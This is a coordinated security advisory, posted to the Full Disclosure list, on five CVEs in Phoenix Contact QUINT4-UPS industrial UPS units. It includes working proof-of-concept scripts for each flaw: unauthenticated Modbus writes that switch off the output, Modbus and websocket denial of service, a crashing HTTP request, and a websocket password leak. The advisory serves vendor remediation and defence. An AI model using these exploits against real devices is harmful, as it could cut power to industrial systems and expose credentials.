Full Disclosure mailing list archives

CyberDanube Security Research 20251014-0
-------------------------------------------------------------------------------
                title| Multiple Vulnerabilities
              product| QUINT4-UPS
   vulnerable version| VC:00<VC:07
        fixed version| VC:07 (partially)
           CVE number| CVE-2025-41703, CVE-2025-41704, CVE-2025-41705,
                     | CVE-2025-41706, CVE-2025-41707
               impact| High
             homepage| https://www.phoenixcontact.com/
                found| 16.04.2025
                   by| D. Blagojevic, S. Dietz, F. Koroknai, T. Weber
                     | CyberDanube Security Research
                     | Vienna | St.
                     | This research was conducted in cooperation with VERBUND
                     | OT Cyber Security Lab during a penetration test.
                     |
                     | https://www.cyberdanube.com
                     |
-------------------------------------------------------------------------------

Vendor description
-------------------------------------------------------------------------------
"What we do
Connecting, distributing, and controlling power and data flows - we have been
developing the right products for this purpose since 1923. Whether in
industrial production facilities, in the field of renewable energies, in
infrastructure, or for complex device connections: our solutions are used
wherever processes must run automatically. Above and beyond their pure
function, they help our partners to develop sustainable applications with more
efficient processes and reduced costs.

We are Phoenix Contact: With innovative products and solutions, we are paving
the way to a climate-neutral and sustainable world."

Source: https://www.phoenixcontact.com/en-us/company

Vulnerable versions
-------------------------------------------------------------------------------
Tested on QUINT4-UPS/24DC/24DC/5/EIP version V2.0.1 / V1.5.1

Affected according to the vendor:
QUINT4-UPS/24DC/24DC/5/EIP VC:00<VC:07
QUINT4-UPS/24DC/24DC/10/EIP VC:00<VC:07
QUINT4-UPS/24DC/24DC/20/EIP VC:00<VC:07
QUINT4-UPS/24DC/24DC/40/EIP VC:00<VC:07

Only affected by CVE-2025-41703 according to the vendor:
QUINT4-UPS/24DC/24DC/5/EIP VC:07
QUINT4-UPS/24DC/24DC/10/EIP VC:07
QUINT4-UPS/24DC/24DC/20/EIP VC:07
QUINT4-UPS/24DC/24DC/40/EIP VC:07

Vendor remidiation:
"Starting with version VC:07, all newly shipped devices will include firmware
updates that address four vulnerabilities: CVE-2025-41704, CVE-2025-41705,
CVE-2025-41706, and CVE-2025-41707. However, configuration of devices via
unauthenticated Modbus/TCP remains possible in VC:07, as this protocol is a
widely used standard in the industrial sector. As a result, VC:07 is still
affected by CVE-2025-41703."


Vulnerability overview
-------------------------------------------------------------------------------
1) Manipulation via Modbus (CVE-2025-41703)
It is possible to turn off the output of the device via Modbus without
authentication.

2) Denial of Service of Modbus (CVE-2025-41704)
The Modbus service is vulnerable to a DoS, an unauthenticated attacker can
exploit this issue to prevent the processing of further Modbus messages.

3) Password Information Leak (CVE-2025-41705)
The device is communicating the password via websockets. An unauthenticated
attacker can intercept the messages to gain access to the credentials.

4) Webserver Denial of Service (CVE-2025-41706)
The webserver is vulnerable to a denial of service condition. A special crafted
GET request with an over-long content-length can be used to trigger the issue.

5) Denial of Service via Websocket (CVE-2025-41707)
The websocket handler is vulnerable to a denial of service condition by sending
a crafted websocket message.



Proof of Concept
-------------------------------------------------------------------------------
1) Manipulation via Modbus (CVE-2025-41703)
The Modbus configuration interface does not require authentication and provides
a way to disable the output of the USV. This is done by setting the 11th bit
of the Code Set Parameters Register (Address 0x1040) to 1.

--------------------------------------------------------------------------------
#!/usr/bin/env python3
# <D.Blagojevic>
import sys

from pymodbus import pymodbus_apply_logging_config
from pymodbus.client import ModbusTcpClient

REG: int = 0x1040  # Code Set Parameters Register
DISABLE_OUTPUT: int = 11


def get_masks(bit: int) -> dict[str, int]:
    mask = (1 << bit) & 0xFFFF
    return {"or_mask": mask, "and_mask": ~mask & 0xFFFF}


def run(ip: str, port: int) -> None:
    pymodbus_apply_logging_config("DEBUG")
    client = ModbusTcpClient(host=ip, port=port)
    client.connect()
    client.mask_write_register(address=REG, **get_masks(DISABLE_OUTPUT))
    client.close()


def main() -> None:
    if 3 < len(sys.argv) or len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} ip [port]", file=sys.stderr)
        sys.exit(1)
    ip: str = sys.argv[1]
    port: int = 502
    if len(sys.argv) == 3:
        port = int(sys.argv[2])
    run(ip, port)


if __name__ == "__main__":
    main()
--------------------------------------------------------------------------------

2) Denial of Service of Modbus (CVE-2025-41704)
The Modbus service is vulnerable to a DoS. The PoC sends a Modbus request with
the Function Code 0x08 (Diagnostic) with the Sub-function 0x0000 (Return Query
Data). After receiving the request the Modbus service doesn't process or
respond to any further request.

--------------------------------------------------------------------------------
#!/usr/bin/env python3
# <F.Koroknai>
from pymodbus.client import ModbusTcpClient

MODBUS_SERVER_IP = "192.168.19.23"
MODBUS_PORT = 502
client = ModbusTcpClient(MODBUS_SERVER_IP, port=MODBUS_PORT)
if client.connect():
    response = client.diag_query_data(b"Test")
    if response.isError():
        print(f"Write failed: {response}")
    else:
        print(f"No Error: {response}")
    client.close()
else:
    print("Could not connect to Modbus server")


-------------------------------------------------------------------------------
3) Password Information Leak (CVE-2025-41705)
The following python poc can be used to leak the password and additional info
from the websocket.

-------------------------------------------------------------------------------
#!/bin/env python3
# S. Dietz <fitfrost4>
from websocket import create_connection
import json
import sys
#pip3 install websocket-client

if len(sys.argv) < 2:
    print("usage: ./{} IP".format(sys.argv[0]))
    sys.exit(1)

router = sys.argv[1]
headers = {
    'User-Agent': 'curl/8.5.0',
    'Accept': '*/*',
    'Upgrade': 'websocket',
    'Sec-WebSocket-Protocol': 'quint'
}

ws = create_connection("ws://{}/ws/quint".format(router), header=headers)
ws.recv()
buf = ws.recv()
js = json.loads(buf)
print(json.dumps(js, indent=2))
ws.close()


-------------------------------------------------------------------------------
4) Webserver Denial of Service (CVE-2025-41706)
The following GET Request can be used to crash the webserver.

-------------------------------------------------------------------------------
GET / HTTP/1.1
Host: 192.168.19.23
Accept-Language: de-DE,de;q=0.9
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Length: 9005


AAAAAAAAAAAAAAAAAAAA[...]AAAAAAAAAAAA


-------------------------------------------------------------------------------
5) Denial of Service via Websocket (CVE-2025-41707)
The following python script can be used to trigger the denial of service
condition of the device.

-------------------------------------------------------------------------------
#!/bin/env python3
# S. Dietz <fitfrost4>
from websocket import create_connection
import json
import sys

if len(sys.argv) < 2:
    print("usage: ./{} IP".format(sys.argv[0]))
    sys.exit(1)

target = sys.argv[1]

payload_dict = {
    "topic": "pingpong",
    "data": [{"key": "A" * 133337, "val": "admin"}],
    "mid": 1
}

payload = json.dumps(payload_dict)

headers = {
    'User-Agent': 'curl/8.5.0',
    'Accept': '*/*',
    'Upgrade': 'websocket',
    'Sec-WebSocket-Protocol': 'quint'
}
ws = create_connection("ws://{}/ws/quint".format(target), header=headers)
ws.send(payload)
ws.close()
-------------------------------------------------------------------------------



Solution
-------------------------------------------------------------------------------
None.


Workaround
-------------------------------------------------------------------------------
Restrict network access to the device.

Vendor mitigation:
"Affected devices are designed and developed for the use in closed industrial
networks. Phoenix Contact therefore strongly recommends using the devices
exclusively in closed networks and protected by a suitable firewall."

Recommendation
-------------------------------------------------------------------------------
Upgrade to a newer hardware.


Contact Timeline
-------------------------------------------------------------------------------
2025-07-17: Sent advisory to Phoenix Contact PSIRT.
2025-07-29: Vendor asked for a call to clarify the vulnerabilities.
2025-07-31: Aligned on timeline for September during call.
2025-08-19: Vendor confirmed publications for 2025-10-14. Confirmed the
            shift.
2025-09-25: Asked the vendor for another call to clarify details regarding all
            affected devices (including other advisories).
2025-09-26: Talked to vendor to clarify details.
2025-10-09: Asked for CVE Numbers. Received and included them in the advisory.
2025-10-14: Coordinated publication of security advisory.



Web: https://www.cyberdanube.com
Twitter: https://twitter.com/cyberdanube
Mail: research at cyberdanube dot com

EOF T.Weber / @2025
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Current thread:

• CyberDanube Security Research 20251014-0 | Multiple Vulnerabilities in Phoenix Contact QUINT4 UPS Thomas Weber | CyberDanube via Fulldisclosure (Oct 18)